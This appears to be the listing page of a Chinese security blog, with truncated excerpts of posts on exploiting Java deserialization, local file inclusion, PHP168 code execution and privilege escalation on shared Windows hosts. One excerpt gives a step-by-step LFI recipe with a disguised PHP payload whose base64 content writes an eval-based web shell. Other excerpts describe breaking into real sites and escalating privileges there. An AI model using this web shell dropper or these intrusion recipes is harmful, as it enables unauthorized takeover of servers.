Java反序列化利用工具 -- Java Deserialization Exp Tools

分类:工具 | 2016-11-5 | 撸过 3,831 次
1人扯谈

Java反序列化漏洞已经被曝出一段时间了,本人参考了网上大神的放出来的工具,将Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。FreeBuf上已经公开了JBoss反序列化执行命令回显的工具,在本文中就不多做叙述了。其实,WebSphere的利用过程也和JBoss差不多,只不过在发送Payload和解析结果的时候多了个Base64编码(解码)的过程。
本工具暂时支持的功能:
1、本地命令执行并回显,无须加载外部jar包,支持纯内网环境检测。
2、支持JBoss、WebSphere和Weblogic的反序列化漏洞检测。
3、支持https数据传输。
4、[......]

继续阅读

利用phpinfo信息LFI临时文件

分类:安全 | 2012-02-12 | 撸过 1,293 次
1人扯谈

还记得之前国外某牛提出的LFI包含临时文件么?

当时确实觉得有些鸡肋,因为临时文件的路径及名字是未知的,虽然临时文件的名字可以利用类似<>*?等通配符(我们暂且称其为通配符)匹配,而同时N个人一起请求的话可能同时生成很多临时文件,因此用通配符也不一定能匹配成,而且临时文件保存的路径也只能靠猜。

我们知道在向服务器上任意php文件post请求上传数据时,都会生成临时文件,以前不知道临时文件的路径和名字只能乱猜,这次国外友人提出利用phpinfo()。

当向任意php文件post请求上传数据时,可以直接在phpinfo页面找到临时文件的路径及名字。

 

参考:

h[......]

继续阅读

LFI漏洞利用总结

分类:安全 | 2012-02-12 | 撸过 1,027 次
1人扯谈

主要涉及到的函数

include(),require()、include_once(),require_once()

magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、 post_max_size()、 and max_input_time()等

典型漏洞代码:

<!–?php include($_GET['pages'].‘.php’); ?–>

[......]

继续阅读

LFI漏洞使用心得

分类:安全 | 2012-02-12 | 撸过 478 次
0人扯谈

1.找到LFI本地包含的漏洞

2.想办法上传不管是通过bbs,FCKEDITOR或者其他任何方式

3.使用如下代码

gif89a0<?fputs(fopen("3.php", "w"), base64_decode("JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1Qm5vdGhhY2slNUQlMjklM0IlM0YlM0U="));?>

 

4.如果没有写入权限可以直接写脚本进行执行命令操作等

利用PERL突破目录无执行权限

分类:安全 | 2011-12-30 | 撸过 395 次
0人扯谈

前几天和谐一个站,独立服务器,就一个站,想提权应该不难。后来发现是坑爹的星外啊。草了啥目录多没权限执行。

翻来翻去翻到个PERL目录,这东西玩的少。在百度搜到一篇吐司发的文章,利用方法拿了权限。文章如下:

目标可写目录无执行权限.装有PERL。有运行权限。但system,exec,“,这几个函数没有权限。

注意PERL并非系统权限。而是继承的nt authority\network service权限,所以默认比web权限略的高点。

 

利用perl的copy 函数
use File::Copy;
$a=’d:\web\cmd.exe’;
$ac=’c:/windows/Micros[......]

继续阅读

谈对星外主机提权利用

分类:安全 | 2011-12-6 | 撸过 523 次
0人扯谈

T00LS上最近段时间谈了比较多星外提权的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限!RegShell读注册表没发现多少利用的东西,但是根据些信息知道是星外

对新手来说在这里很容易陷入困境!
星外sa密码注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 32位M[......]

继续阅读

PHP168 V6.02 整站系统远程执行任意代码漏洞利用

分类:安全 | 2011-08-12 | 撸过 419 次
0人扯谈

漏洞出在 inc/function.inc.php 里面 .get_html_url() 这个函数.

inc/function.inc.php:

function get_html_url(){
global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type;
$id=$aid;
if($page<1){
$page=1;
}
$postdb[posttime]=$rsdb[posttime];

if($showHtml_Type[bencandy][$id]){
$filename_b=$showHtml_[......]

继续阅读